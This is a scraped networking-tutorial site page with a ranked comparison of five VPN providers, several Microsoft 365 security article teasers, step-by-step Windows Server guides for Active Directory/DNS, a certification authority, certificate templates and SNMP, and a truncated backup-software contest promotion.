
No.1: StrongVPN

StrongVPN - Best VPN Service

StrongVPN takes the 1st position thanks to its performance and solid VPN client that provides a plethora of fine-tuning options. With more than 650 servers located in 22 countries, the number might seem small compared to other providers, but it’s rare you’ll need to frequently jump between servers to get a stable and fast connection.

StrongVPN No-Log Policy

StrongVPN provides a true No-Log Policy service which means no logs are stored about your connection or account. This makes StrongVPN ideal for users who take their privacy seriously and don’t want any type of logging from their VPN Provider.

StrongVPN Performance

While our test results fluctuated we were not concerned at all simply because the average results were significantly faster than all other VPN providers. It should also be noted that testing was performed using OpenVPN TCP as OpenVPN UDP didn’t seem to work with the US-based servers we connected to. Taking into consideration that OpenVPN TCP is slightly slower than OpenVPN UDP we are very surprised with the speeds we managed to get.

Download speeds averaged 67Mbps but managed to peak at a whopping 136Mbps, which was a fantastic result:

StrongVPN Speed Test - Download / Upload Tests

StrongVPN provides super-fast download speeds and exceptional upload speeds

Upload speeds were strong, averaging 96Mbps and peaking at an impressive 150Mbps. A similar surprise was the latency test, which averaged a very low 170ms making it amongst the fastest and lowest in latency connections. Running delay-sensitive applications or services such as VoIP or video won’t be a problem.

Finally StrongVPN offers unlimited downloading, uploading and streaming.

StrongVPN Client & Security Features

The desktop VPN client interface certainly brings back memories of an older GUI interface but we’ve been advised that it will soon be upgraded to a newer sleeker GUI on par with other providers.

The StrongVPN VPN Client GUI interface

The StrongVPN GUI interface

What the desktop GUI lacks in appearance it certainly makes up for in features but, most importantly, speed. The options available allow the end user to tweak the VPN connection to even adjust the MSS - MTU size, compression, encryption level and a whole bunch of other useful features Torrent users and Gamers will appreciate.

Kill Switch, DNS Leak Protection are built into the client and users can select the encryption protocol of their choice which includes OpenVPN (TCP or UDP), L2TP-IPSec, PPTP or SSTP. Changing between countries or cities is an easy process, simply select the desired country/city from the middle drop-down list and click on connect. This will change your account preferences and force the client to connect to the new location.

In contrast to the desktop VPN client, the mobile StrongVPN client will leave you wondering if we are talking about the same provider. It’s an impressive stylish application that resonates with the message “We mean serious business here”:

StrongVPN mobile VPN client – a stunning application

StrongVPN mobile client – a stunning application

The StrongVPN client is available for Windows, MAC, mobile iOS and Android devices. Users can change country/city as required and simply hit the power button in the middle of the screen – once connected the button will turn green as shown above.

StrongVPN does not offer its own Linux-based VPN client, however, Linux users can download and use the open-source OpenVPN client which is fully compatible.

StrongVPN Supports Netflix VPN Streaming

We were very pleased to see US Netflix work with StrongVPN. StrongVPN had the most US-based VPN servers from which Netfix would work without a problem. This is definitely a major advantage over its competition.

StrongVPN Unblocking US Netflix US Netflix HD streaming with StrongVPN (click to enlarge)

Streaming High Definition video didn’t seem like a real challenge for StrongVPN as it was able to stream continuously without any glitches even when downloading torrents and performing casual web browsing. Again, speed and bandwidth availability is the key ingredient here.

StrongVPN Router Software & Support

StrongVPN does not develop its own router firmware, however, it does provide detailed instructions on how to setup DD-WRT, Tomato by Shibby (no longer developed), Sabai Router OS, Mikrotik RouterOS and other o/s to connect to its VPN network. StrongVPN support contains perhaps the largest database of router devices and operating systems amongst all VPN Providers reviewed.

Encryption protocols supported for Router VPNs are OpenVPN (TCP or UDP) and PPTP, however, in order to take full advantage of the speeds the VPN Provider is capable of delivering, you’ll need to ensure your router has enough CPU horsepower under the hood!

StrongVPN Pricing & Plans

The $3.97US/month price tag (based on a yearly subscription) is a fantastic deal considering the features the services provided. The limit of 2 simultaneous VPN logins is slightly restrictive but everything else was simply great. The 5 day money-back guarantee was also acceptable as it allows users enough time to properly evaluate the service.

Closing, StrongVPN accepts Bitcoin payments along with Paypal, and Visa, providing users with more than enough payment options.

Click here to read our recent in-depth review of StrongVPN

 visit best VPN service - StrongVPN

 

No.2: ExpressVPN

ExpresVPN - Best VPN Service

ExpressVPN is another great choice. A reputable VPN Service provider, ExpressVPN offers superior VPN connectivity and very fast download speeds across its +1000 servers spread among 87 countries.

ExpressVPN No-Log Policy

ExpressVPN’s No-Log Policy states that it doesn’t track its users’ activities but it does maintain information such as the dates (not times) connected to the VPN service, VPN Server connected to and amount of data transferred. While Torrent users might not like the idea that some information is logged, ExpressVPN clearly states on its website that the information collected cannot be used to identify its users.

ExpressVPN Performance

ExpressVPN performed extremely well and was able to provide sustained transfers for both speed tests and torrent downloads. Download speeds averaged a bit more than 30Mbps which is adequate for torrenting, gaming, video streaming and casual web browsing.

ExpressVPN offers great download and upload speeds

ExpressVPN offers great download and upload speeds

Upload speeds were also a pleasant surprise averaging 65Mbps and peaking at 81.69Mbps! Our tests were performed using the OpenVPN UDP protocol.

Latency was a low and stable 193ms marking the provider suitable for all types of traffic including delay-sensitive VoIP. ExpressVPN offers unlimited downloading, uploading and streaming.

ExpressVPN Client & Security Features

Don’t be fooled by the ExpressVPN client’s simple interface as behind the three buttons and menu (top left) users will find a lot of features and settings that can be enabled as required. Security conscious users will enjoy the Kill Switch, DNS Leak Protection and ability to easily select the encryption protocol of their choice which includes OpenVPN (TCP or UDP), L2TP – IPSec, PPTP, SSTP or simply leave it to the VPN client to select the most suitable.

The ExpressVPN VPN client: A combination of simplicity and great functionalityThe ExpressVPN VPN client: A combination of simplicity and great functionality

The Smart Location feature is extremely handy for users frequently travelling. It automatically selects the nearest VPN Server based on your current location, in an effort to provide you with the fastest possible VPN experience.

The ExpressVPN client is available for Windows, MAC, mobile iOS and Android devices but also Linux 32/64bit Ubuntu, Debian, Fedora, and CentOS. It should be noted that ExpressVPN is the only provider to have developed its own VPN client for such a wide range of Linux distributions. Nice!

ExpressVPN Supports Netflix VPN Streaming

After connecting to a number of US-based servers we were able to find a few that happily supported Netflix. Streaming High Definition video was smooth without delays, which was very pleasing. While Netflix buffers the video using short high-bandwidth bursts that reached up to 9Mbps, ExpressVPN was able to deliver without a problem.

US Netflix HD streaming with ExpressVPNUS Netflix HD streaming with ExpressVPN (click to enlarge)

ExpressVPN Router Software & Support

ExpressVPN has developed its own firmware that supports specific retail routers enabling customers to tunnel all their internet traffic through ExpressVPN’s servers. Customers have the choice to purchase a router preloaded with firmware or download and install it on an existing compatible router. ExpressVPN also provides support for its firmware, ensuring customers are not left in the dark should problems arise.

ExpressVPN Pricing & Plans

At $8.32US/month (based on a yearly subscription) ExpressVPN’s pricing is higher than its competitors, however, it does support up to 3 simultaneous VPN logins and users will certainly get their money’s worth thanks to great speeds, support for Netflix (via specific US-based servers) and a 30 day money-back guarantee. Users who prefer can also make payments via Bitcoin, ensuring complete anonymity.

visit best VPN service - ExpressVPN

 

No.3: IPVANISH

IPVANISH Best VPN Service

IPVANISH is one of the most popular VPN Service Providers available. Its robust VPN services are spread across more than 700 servers located in 60 countries. IPVANISH offers a number of great features including a Socks5 Proxy for its customers who want to quickly bypass regional restrictions and are not concern about encryption.

IPVANISH No-Log Policy

IPVANISH advertises a No-Log Policy which means users can connect to the global IPVANISH VPN network knowing their activities are not tracked or monitored by the provider. IPVANISH does not indicate that it keeps any type of logs that might be able to be used against its customers.

Logging might be enabled in case of a technical support case with the purpose of helping troubleshoot a customer problem.

IPVANISH Performance

Bandwidth and VPN performance won’t be a problem thanks to fast servers which didn’t appear to be congested and were able to provide a sustainable download speed for our Torrent download test and video streaming. Our tests were performed using the OpenVPN UDP protocol and showed average download speeds of around 39Mbps while upload speeds were averaging an impressive 90Mbps peaking at 121.69Mbps!

IPVANISH Great Download and Upload Speed Tests

IPVANISH speed tests provided excellent results and acceptable latency

Latency was a low at 215ms considering our packets were travelling from Melbourne Australia to San Jose US via the VPN Provider. The round-trip delay for voice packets (VoIP) shouldn’t exceed 300ms, or 150ms latency in each direction, so the 215ms we got was suitable for pretty much any application or service a user would want to run over the VPN. IPVANISH offers unlimited downloading, uploading and streaming.

IPVANISH VPN Client & Security Features

IPVANISH offers a great VPN client that supports Windows, MAC, iOS and Android (phones + mobiles) plus Ubuntu Linux, making it one of only two providers offering native application support for the great Linux operating system.

The VPN client is packed with some great security features, including Kill Switch, DNS Leak Protection, IPv6 Leak Protection and the ability to obfuscate OpenVPN traffic to avoid it being detected by intelligent Firewalls. It even has an awesome Simple Mode feature that replaces the fairly large GUI interface with a small neat window as shown below:

IPVANISH Best VPN Client Advanced and Simple Mode

The IPVANISH VPN client switching between Advanced and Simple mode

Support for all the popular VPN protocols, such as PPTP, L2TP and OpenVPN (TCP/UDP) is there to accommodate different encryption requirements even though users would rarely want to use anything other than OpenVPN.

Finally, a neat feature we really liked was the ability to automatically locate the best VPN Server based on the country we wanted to connect to – this made it really easy to ensure we were automatically directed to a non-congested VPN server.

IPVANISH Supports Netflix VPN Streaming

Netflix users will be happy to learn that we were successfully able to watch our favourite movies using the highest possible video streaming setting (HD – High Definition) for our test bed (HD Laptop). The VPN provider was able to provide a sustainable 5Mbps download speed delivering an enjoyable experience without any glitches:

 US Netflix HD streaming with IP Vanish VPN

US Netflix HD streaming with IP Vanish VPN (click to enlarge)

While Netflix users might need to try different US-based VPN Servers to find a server that is not blocked, we were able to stream from the first VPN server we connected to! Further testing did reveal some of the provider’s servers are blocked from Netflix, however that to be expected with most VPN providers.

IPVANISH VPN Router Software & Support

While IPVANISH doesn’t create its own Router App it does support the well-known DD-WRT and Tomato by Shibby software platform. IPVANISH provides detailed step-by-step instructions on its site on how to setup OpenVPN (UDP and TCP) on these platforms to connect with its network.

IP VANISH Pricing & Plans

With up to 5 simultaneous VPN logins allowed (one for every family member!), a monthly price of just $6.49US (based on a yearly subscription) and a 7 day money-back guarantee, you definitely can’t go wrong. It should also be noted that IPVANISH fully supports Bitcoin payments.

visit best VPN service - IPVanish

 

No.4: NordVPN

NordVPN Best VPN Service

NordVPN is amongst the Top VPN Providers. NordVPN certainly has significant features that will appeal to many of our readers. With more than 720 servers world-wide across 56 countries it’s hard to neglect this provider.

NordVPN No-Log Policy

NordVPN advertises a No-Log Policy which will certainly attract attention. According to NordVPN, the company doesn’t track any information and this is thanks to its headquarters being based in Panama, which doesn’t require data to be stored or any reporting.

NordVPN Performance

While NordVPN didn’t break any records for its download speeds, its upload speeds were exceptional and consistent.

At an average 26Mbps download speed home users can easily download torrents or stream videos without concern.

 NordVPN download, upload and latency tests were great

NordVPN download, upload and latency tests were great

Upload speeds shone at average of almost 88.5Mbps and, as previously mentioned, they were steady across all tests performed which is a sign of a stable VPN provider. Upload peaks of 89.52Mbps were nice to see but we would have preferred seeing them in the download test instead.

Latency was a bit of a concern at 221ms which means that online games that don’t tolerate lag very well might give users a hard time, however, connecting to VPN servers within the country of residency would surely make a difference.

OpenVPN UDP was the encryption protocol under which the tests were performed. NordVPN offers unlimited downloading, uploading and streaming.

NordVPN Client & Security Features

The NordVPN client is a really nice one, packed with a number of great features that helped it earn its No.4 position in our Best VPN Service comparison. When launched it provides a map of the world allowing you to quickly connect to a server of your choice. Intermediate users can visit the servers tab to obtain a full list of servers or quick shortcuts to categorized servers depending on the application of interest e.g P2P servers, Ultra-fast TV servers, Double VPN servers etc. Security features include Kill Switch, Auto Connect, DNS Leak Protection, Selection of TCP/UDP for VPN connectivity, custom DNS servers and more.

The Kill Switch provides the additional functionality of killing a specific application when the VPN fails – a very handy feature.

 NordVPN VPN Client

NordVPN Client – a VPN client packed with features (click to enlarge)

NordVPN offers support for the Windows platform, MAC, Mobile iOS and of course Android. This means it is capable of covering the majority of devices in the market today. Similar to other VPN Providers, Linux users will have to use the open-source OpenVPN client which is fully compatible with the provider.

NordVPN Supports Netflix VPN Streaming

During our tests we were able to confirm that NordVPN provides support for US-based Netflix. The NordVPN client provides a feature named Smart Play which allows its users to stream Netflix and similar services from anywhere in the world no matter which VPN server they connect to.

We tried this fantastic feature but were disappointed as it didn’t seem to work as advertised. We initially connected to an Australian VPN server and logged in to our US Netflix account, however, when we attempted to stream a movie we were greeted with a familiar error in our browser:

 NordVPN SmartPlay Netflix Error

NordVPN Smart Play feature for Netflix didn’t work for us (click to enlarge)

We then decided to connect to a US-based VPN Server and try to stream Netflix from there – that seemed to work fine, however, we did notice it was taking slightly longer for the video stream to start:

NordVPN Netflix Streaming 

US Netflix HD streaming with NordVPN connected to US VPN Server (click to enlarge)

NordVPN Pricing & Plans

As with all VPN Providers, purchasing a 12 month subscription provides considerable savings. NordVPN pricing at $5.75US/month (based on a yearly subscription) is a great deal and ideal for users with multiple devices since it allows up to an impressive 6 simultaneous VPN logins. The equally impressive 30 day money-back guarantee gives users plenty of time to properly evaluate NordVPN’s service.

Sceptical users can even try NordVPN Free of charge for 3 days without entering any financial details (Visa, Paypal etc) which is a great feature and one you should try if you have the time.

Users who decide to continue using the service can also opt to pay via Bitcoin to further secure their details.

visit best VPN service - NordVPN

 

No.5: Private Internet Access (PIA)

Private Internet Access Best VPN Service

Private Internet Access is a well-known VPN service provider that’s rightly earned its position amongst our best VPN Service Providers. Its huge VPN network, consisting of more than 3270 servers located in 24 countries, means it will be difficult to find a congested server at any time of the day or night. Private Internet Access is the second provider who offer a free SOCKS5 proxy server to their users.

For an extensive review on PIA, including security tests, DNS Leak tests, Torrent Protection, Kill-Switch test, Netflix support and much more, read our Best VPN Review: Private Internet Access (PIA)

Private Internet Access No-Log Policy

Private Internet Access is another VPN Provider that offers a No-Log Policy which means anonymous browsing and user privacy is a top priority here. Users requiring complete anonymity can even use Bitcoin to pay for their subscription in which case the provider won’t store any financial information on your account.

Private Internet Access Performance

Similar to our other tests, we connected to a US-based VPN server via our premium internet connection.

Private Internet Access Download / Upload Speed & Latency Tests

Private Internet Access Download / Upload Speed & Latency Tests

Speed tests showed an average, but acceptable, 23.94Mbps download and an impressive 108.41Mbps upload. Testing different servers yielded similar results, however, these speeds are more than capable of delivering an enjoyable browsing and downloading experience without any interruptions.

The latency test was a big surprise, 168ms – only 2ms faster than StrongVPN. Given most VPN Providers averaged around 200msec, it was nice to see Private Internet Access provide such a fast connection to the other side of the world. Finally Private Internet Access offers unlimited downloading, uploading and streaming.

Private Internet Access Client & Security Features

Unlike other VPN clients, the Private Internet Access client stays continuously minimized in the task tray. To open the client’s control settings users must right click on the Private Internet Access icon in the task tray and select settings as shown below:

Accessing Private Internet Access VPN client settings 

Accessing Private Internet Access VPN client settings

The VPN client offers a Simple and Advanced mode. Switching between the two is as simple as clicking on the Simple/Advanced toggle button on the bottom left side:

 Private Internet Access VPN client Advanced Mode settings

Private Internet Access VPN client Advanced Mode settings (click to enlarge)

The Private Internet Access client provides a healthy amount of security options and settings. Kill Switch, DNS Leak Protection, IPv6 Leak Protection are all included within the client plus PIA’s MACE service which blocks ads, trackers and malware while connected to the VPN service. The Region settings on the left allows the user to connect to different VPN Servers, an option also available when right-clicking on the PIA icon in the task tray.

The VPN client also integrates a firewall to help stop incoming connections reaching your PC or mobile device and adding an additional layer of security.

The Private Internet Access VPN client is built on OpenVPN and provides strong data encryption and authentication but it does not support PPTP or L2TP/IPSec encryption protocols. To connect via PPTP or L2TP/IPSec to a Private Internet Access VPN Server, users must use their device’s (workstation, mobile phone etc) built-in native VPN client which can prove a bit of a tedious task – especially if you’ve never done it before.

Thankfully Private Internet Access provides a well-documented support section to help get users connected with these alternatively supported encryption protocols.

The Private Internet Access VPN client is offered for the Windows, MAC OS, Apple iOS, Android and Linux (Ubuntu) platforms. Users with other Linux-based distributions will have to install and use the native open-source OpenVPN client from openvpn.net.

Private Internet Access also provides support documentation for configuring DD-WRT, Tomato by Shibby and other platforms.

Private Internet Access Supports Netflix VPN Streaming

Surprisingly enough we were able to access our US Netflix account using most of Private Internet Access’s US-based VPN Servers - a pleasant surprise considering they won’t admit US Netflix works from their VPN network!

 US Netflix streaming with Private Internet Access

US Netflix streaming with Private Internet Access (click to enlarge)

Streaming in High Definition (HD) was excellent without any problems. Videos loaded without noticeable delay providing a great experience that would easily satisfy demanding users. We also tried placing some load on our broadband connection by downloading files, however, Private Internet Access’s VPN Server was able to keep pumping traffic to us without an issue.

We should remind our readers that the US Netflix streaming for all VPN Providers was performed from a 20Mbps home broadband connection to help simulate the majority of user environments.

Private Internet Access VPN Router Software & Support

Private Internet Access doesn’t provide any custom Router app, however, it does support and provide detailed step-by-step instructions on how to setup DD-WRT, Tomato routers and PfSense with its network using OpenVPN.

Private Internet Access Pricing & Plans

Private Internet Access provides a generous up to 5 simultaneous VPN logins which is enough to support a laptop computer, desktop workstation and 2-3 mobile devices making it a very attractive and flexible solution.

With a pricing of just $3.33US/month, it is the cheapest VPN Provider solution in our review and shouldn’t be overlooked. There is a 7 day money-back guarantee which is enough to test the service and it accepts Bitcoin payment for complete anonymity.

Private Internet Access could easily be in the Top 3 Best VPN Service Providers if download speeds were faster.

 

best vpn service comparison
The Best VPN Service Providers. Scroll above for each provider's direct link.

 Summary: Best VPN Service Providers

We hope this extensive comparison of six of the Best VPN Service Providers has provided enough information to help you decide which VPN provider is best for you. As VPN providers upgrade and introduce new features we’ll ensure this VPN Service comparison guide is kept up to date.

The ultimate choice lies with the end customer – you.

  • Hits: 56244
How to Protect Your Business with Microsoft 365 Security Tools

How to Protect Your Business with Microsoft 365 Security Tools

Protecting your business with M365 security toolsBusinesses of all sizes are more and more adopting cloud-based platforms like Microsoft 365 to streamline operations, improve collaboration, and increase productivity. However, this newfound reliance on such software solutions makes these businesses prime targets for cybercriminals.

With sensitive data stored and shared across the suite, securing your Microsoft 365 environment is essential to protect your business from potential threats.

Fortunately, Microsoft 365 comes with a robust set of built-in security tools designed to safeguard your organization from cyberattacks, data breaches, and other security incidents.

10 ways to secure your business data with Microsoft 365

But despite that, we cannot ignore the importance of third-party Microsoft 365 total protection solutions. Without going too much into detail, these solutions enhance the already powerful native security features. But what are these features?

In this article, we’ll explore the key Microsoft 365 security tools you can use to protect your business.

Key Topics:

Related Articles:

Key Microsoft 365 Security Tools to Protect Your Business

Microsoft Defender for Office 365

Microsoft 365 DefenderOne of the most critical security solutions within the Microsoft 365 ecosystem is Microsoft Defender for Office 365. This tool is specifically designed to protect against email-based threats such as phishing, malware, and ransomware, which are common attack vectors targeting businesses.

Defender for Office 365 leverages real-time threat intelligence to detect and block malicious activity before it reaches your users.

Key features include:

Microsoft 365, M365, Security Tools, MFA, MDM, AIP, Azure

Continue reading

  • Hits: 1311
Empowering Users with Cyber Security Awareness Training

Empowering Users with Cyber Security Awareness Training

Cyber Security TrainingData breaches and cyber threats cast a long shadow over both organizations and individuals alike, making the need for robust cyber security measures more pressing than ever. However, the most advanced technology in the world cannot fully protect against cyber risks if the people using it are not aware of the dangers and the best practices for avoiding them.

It is here that cyber security awareness training becomes invaluable, offering a crucial layer of defense by educating and empowering users. This article explores the critical role of cyber security awareness in the modern digital world, highlighting its significance and providing insights on how organizations can cultivate a culture instilled with security consciousness. Join us as we unravel the key components of implementing robust cyber security awareness training to fortify your digital defenses.

Key Topics:

Related Articles:

What is Cyber Security Awareness?

Cyber Security Awareness trainingCyber security awareness encapsulates the knowledge and behaviors that individuals within an organization adopt to protect its information assets. It's not merely about having the right technology in place; it's about ensuring every member of the organization understands the role they play in maintaining security. This understanding spans recognizing potential threats, such as malware, adhering to IT Security protocols, and adopting best practices to mitigate risks.

Beyond mere compliance, it fosters a proactive mindset that empowers individuals to act decisively and effectively in the face of potential cyber threats, thereby reinforcing the organization's digital defenses.

Why Is Cyber Security Awareness Training Important?

Some of the cyber threats posing risks to organizations are quite sophisticated, ranging from phishing scams to ransomware attacks. Cyber security awareness trains employees to identify and respond to cyber threats effectively. It transforms employees from being the weakest link in the security chain to a robust first line of defense.

By raising awareness and educating staff, organizations can potentially eliminate cyber attacks and data breaches altogether. Now, let’s see why cyber security awareness training is important.

Your Employees Are The First Line of Defense

Employees often inadvertently become conduits for cyber threats. Simple actions, such as responding to phishing emails or utilizing compromised devices, can expose organizations to significant risks. Cyber security awareness training endows employees with the essential critical thinking skills to evaluate suspicious activities and make informed, secure decisions.

Cyber Security Awareness Training and M365

Continue reading

  • Hits: 2769
Microsoft 365 Security

Boost Your Microsoft 365 Security with Expert Guidance and Proven Best Practices

Microsoft 365 SecurityThis article serves as a comprehensive guide to fortifying the security posture of Microsoft 365, covering essential aspects ranging from foundational security principles to advanced strategies for optimizing productivity without compromising security. From introducing the fundamental Microsoft 365 Security Essentials to defining proactive measures such as regular audits, secure configurations, and Data Loss Prevention (DLP) protocols, this guide equips organizations with the knowledge necessary to establish a resilient security framework.

Furthermore, the article delves into protecting user identities and sensitive data, proven strategies such as Multi-Factor Authentication (MFA), identity protection mechanisms, and data encryption techniques. By prioritizing these measures, businesses can mitigate the risk of unauthorized access and data breaches, thereby bolstering trust and compliance with regulatory standards.

Moreover, the article explores how organizations can optimize security measures to enhance productivity, emphasizing the role of role-based access control (RBAC), security awareness training, and the utilization of security dashboards and reports. By integrating security seamlessly into daily workflows, businesses can foster a culture of vigilance while empowering employees to navigate digital environments securely.

Key Topics:

Introduction to Microsoft 365 Security Essentials

Continue reading

  • Hits: 4518
Windows Server 2022 AD and DNS Deployment

Deploying Active Directory & DNS Services on Windows Server 2022 & Elevating it to Domain Controller Role

intro windows server 2022 ad dnsThis article provides a comprehensive guide to deploying Active Directory and DNS Services on Windows Server 2022, encompassing the Essential, Standard, and Datacenter editions. Our guide also includes step-by-step instructions for promoting the Windows server to a Domain Controller (DC). To enhance user experience, we've included plenty of helpful screenshots, ensuring a smooth and uncomplicated installation process.

 

Key Topics

Explore our dedicated section on Windows Servers for a rich collection of articles providing in-depth coverage and insights into various aspects of Windows Server functionality.

Installation of Active Directory and DNS Services

To begin, in Server Manager, select Dashboard from the left pane, then Add roles and features from the right pane:

Windows Server 2022, Windows Server, AD, Active Directory, Domain Controller, DNS Server, DNS

Continue reading

  • Hits: 6501

How to Enable ‘Web Server’ Certificate Template Option on Windows Certification Authority (CA) Server

In this article we will show you how to enable the ‘Web Server’ certificate template option on a Windows Certification Authority (Windows CA) Server.  The Web Server option is usually not present in a fresh Windows CA server installation installation which can introduce difficulties for users or administrators who need the option to get their web server certificates signed:

windows ca web server certificate template missing

Recommended Article: How to install and configure a Windows CA Server

Enabling the Web Server certificate template is a simple and non-disruptive process. From the Administrative Tools, open the Certification Authority tool. Next, right-click on the Certificate Templates folder and select Manage:

windows ca certificate templates

This will open the Certificate Templates Console as shown below.  Double-click on the Web Server template:

windows ca certificate templates console

The Web Server Properties window will now appear. Click on the Security tab and select the Authenticated Users from the Group or user names section.  In the Permissions for Authenticated Users section tick the Allow action for the Enroll permission. When ready, click on OK:

windows ca web server properties

Congratulations - you’ve now successfully enabled the Web Server certificate template option. Your Windows CA server should now present the previously mission option as shown below:

windows ca web server certificate template enabled

Summary

This article explained how to enable the Web Server certificate template option on your Windows Certification Authority (Windows CA) Server. We included step-by-step screenshots to ensure its a detailed and yet simple process to follow.

  • Hits: 64967

How to Install and Configure SNMP for Windows Server 2016

Simple Network Management Protocol (SNMP) is a UDP protocol that uses port 161 to monitor and collect detailed information on any network device supporting the SNMP protocol. All Windows servers support SNMP and we’ll show you how to easily install and configure SNMP on your Windows 2016 or 2012 server, including Read Only (RO) or Read Write (RW) SNMP community string.

In our example we will enable the SNMP agent and configure a SNMP community string to allow our Network Monitoring System (NMS) monitor our server resources.

Execution Time: 10 minutes

Step 1 – Install SNMP on Windows Server 2016

Open the Control Panel on your Windows Server and Double-click on the Program and Features icon:

windows server turn features on off

This will open the Add Roles and Features Wizard. Keep clicking on the Next button until you reach the Features section. From there, select the SNMP Service option:

windows server snmp service installation

When prompted, click on the Add Features button to include the installation of the Administration SNMP Tools:

windows server additional snmp tools

Optionally you can include the SNMP WMI Provider option located under the SNMP Service. When ready click on the Next button.

This is the final screen – simply click on the Install button. Ensure the Restart the destination server automatically if required option is not selected:

windows server snmp installation confirmation

The SNMP Service will now be installed on your Windows 2016 Server. This process will require around 3 minutes to complete. When done, click on the Close button to exit the installation wizard: windows server snmp installation complete

Step 2 – Configure SNMP Service & Read-Only or Read-Write Community String

Configuring the Windows 2016 Server SNMP Service is a simple task. As an administrator, run services.msc or open the Services console from the Administrative Tools. Double-click the SNMP Service and go to the Security tab:

windows server snmp service configuration 1

To add a Read-Only community string, click on the Add button under the Accepted community names. Enter the desirable Community Name and set the Community rights to READ ONLY. When done, click on the Add button:

windows server snmp service configuration 2

Next, in the lower section of the window, click on the Add button and insert the IP address which will be allowed to poll this server via SNMP. This would be the IP address of your Network Monitoring Service. In our environment our NMS is 192.168.5.25. When done, click on Apply then the OK button:

windows server snmp service configuration 3

To confirm SNMP is working correctly, we configured our NMS to query and retrieve information from our server every 5 minutes. After a while we were able to see useful information populating our NMS:

windows server snmp resource monitoring

Depending on your Network Monitoring System you'll be able to obtain detailed information on your server's status and state of its resources:

windows server snmp resource monitoring

Summary

This article briefly explained the purpose of SNMP and how it can be used to monitor network devices and collect useful information such as CPU, RAM and Disk usage, processes running, host uptime and much more. We also showed how to install and configure the SNMP Service for Windows Server 2016. For more technical Windows articles, please visit our Windows Server section.

  • Hits: 51601

Simple Guide on Installing & Configuring a Windows 2016 Certification Authority Server

windows ca serverA Windows Active Directory Certification Authority server (AD CA), also known as a Certificate Authority, is an essential service to every organization’s Active Directory as it can manage, issue, revoke and renew digital certificates used to verify the identity of users, computers and other network services.

This guide will show you how to quickly install and setup a Certification Authority server on Windows 2016 server. The guide includes the installation of the Certification Authority Web Enrollment service to allow your organization to request, renew and download certificates via a simple web interface.

Execution Time: 10 - 15 minutes

Step 1 – Installation of Windows Active Directory Certificate Services

Launch Server Manager and go to Manage > Add Roles and Features:

windows ca server installation server manager

 At the next screen select simply click on the Next button:

windows ca server installation add roles features

 Ensure Role-based or feature-based installation is selected and click on Next:

windows ca server installation select destination server

 At the next screen select the destination server from the available Server Pool and click on the Next button:

windows ca server installation select server

Next, tick the Active Directory Certificate Services from the available roles:

windows ca server installation select server role

The Add Roles and Features Wizard will immediately pop up a new window requiring you to confirm the installation of additional tools needed to manage the CA feature. To confirm, click on the Add Features button:

windows ca server installation add additional features

You will now return to the previous window. Simply click on the Next button to continue.

At the Select Features window just click on the Next button:

windows ca server installation select features

The next section is around the Certificate Services we want to install. The initial window warns that once the computer/server name cannot be changed after a certification authority (CA) has been installed. Take a moment to read through the information and click on Next when ready:

windows ca server installation ad cs

The next window allows you to select the desired Certification Authority services to be installed. The first one, Certification Authority is selected by default however it is advisable to also select the Certification Authority Web Enrollment feature as it will provide a simple web interface from where you can submit certificate signing requests, download certificates and more.

windows ca server installation ad cs services

As soon as the Certification Authority Web Enrollment feature is selected a pop up window will appear requesting confirmation to install additional features needed. Click on Add Features:

windows ca server installation ad cs additional features

You’ll now be returned back to the previous window, click on Next to continue.

The next screen is required for the installation of IIS Web Services. If you already have IIS installed, you won’t need to run through these steps. Click on Next to continue:

windows ca server installation iis web server role

At the next screen, IIS Web Server options, we can easily accept the default selected services. Feel free to scroll down and check the available options otherwise simply click on Next to continue:

windows ca server installation iis web server features

The final window is a simple confirmation of all selected services and features. Note the automatic restart option at the top – it’s advisable not to use it as the Window Server might restart once installation is complete.

When ready, click on the Install button to begin the installation:

windows ca server installation confirm installation options

Installation can take from 5 to 10 minutes depending on how busy the server is. Once complete it is necessary to configure Active Directory Certificate Services on the destination server by clicking on the link provided at the end of the installation wizard:

windows ca server installation progress

Step 2 - Configuring Active Directory Certificate Services (AD CS)

Configuring Active Directory Certificate Services is a simple and quick process. You can initiate this process from the previous step or from the Server Manager Dashboard by clicking on the exclamation mark and selecting Configure Active Directory Certificate Services on the destination server:

windows ca server installation configuring ca

Once the configuration process is initiated, the system will require credential confirmation to install the necessary role services. Enter a username that belongs to the Local and Enterprise Admin group. By default the Administrator username will appear. When ready click on Next:

windows ca server configuration credentials

Next, select the Role Services to be configured. The two services available for us are Certification Authority and Certification Authority Web Enrollment. Select them both and click on Next:

windows ca server configuration role services

At the next screen select Enterprise CA (default) as CA setup type and click on Next:

windows ca server configuration setup type

Next, assuming this is the first and possibly only CA in your organisation, select Root CA (default) as the type of CA and click on Next:

windows ca server configuration ca type

Next, we will create a new private key (default option) and click on Next to configure its options:

windows ca server configuration private key

On the next screen we can leave all options to their default settings and continue. Alternatively a different hash algorithm can be selected e.g SHA384 or SHA512 with a larger Key Length. When ready, click on Next:

windows ca server configuration ca cryptography

Here we can change or leave the suggested Common Name (CN) for our Certification Authority (CA). When ready, click on Next:

windows ca server configuration ca name

The Validity Period determines how long the certificate generated for our CA will be valid. By default this is 5 years however it can be adjusted either way. Enter the desirable amount of years and click on Next:

windows ca server configuration certificate validity period

Last option is the configuration of the database locations. Accept the default locations and click on Next:

windows ca server configuration database location

Finally, we are presented with a confirmation window with all settings. This is the last chance to change any settings or values. When ready, click on Configure:

windows ca server configuration confirmation of settings

After a few seconds the Results window will appear confirming all roles, services and features have been successfully configured.  Click on Close to exit the configuration wizard:

windows ca server configuration complete

We’ll now find the Certificate Authority MMC available in the Administrative Tools:

windows ca server mmc console

We can also visit the CA Server’s web site to request and download signed certificates by visiting the URL:  http://<server IP>/certsrv e.g http://192.168.1.10/certsrv:

windows ca server webserver access

Summary

This article explained the role and importance of a Windows Certificate Authority Server provided a step-by-step guide how to install and configure a Windows 2016 Certification Authority Server including the Certification Authority Web Enrollment component.

  • Hits: 31016

Download Altaro Free VM Backup & Win a PlayStation 4 Pro, Xbox One X, 3-Year Amazon Prime and more!

We have some exciting news for you today!

Altaro has launched a great contest in celebration of SysAdmin Day on 27th July!

They will be giving away Amazon eGift Cards to the first 100 eligible entries and 1 Grand Prize to 1 lucky winner.

The Grand Prize winner will be able to choose any prize from the following: a PlayStation 4 Pro, Xbox One X, a 3-year membership of Amazon Prime, an Unlimited Plus Edition of Altaro VM Backup, and more!

All contest participants will even get FOREVER FREE backup for 2 VMs when they download Altaro VM Backup!

altaro 2018 syadmin day - Free Grand Prizes

Want to WIN?

Here’s what you need to do to:

  1. Download Altaro VM Backup from https://goo.gl/Zvedfs using a valid work email address
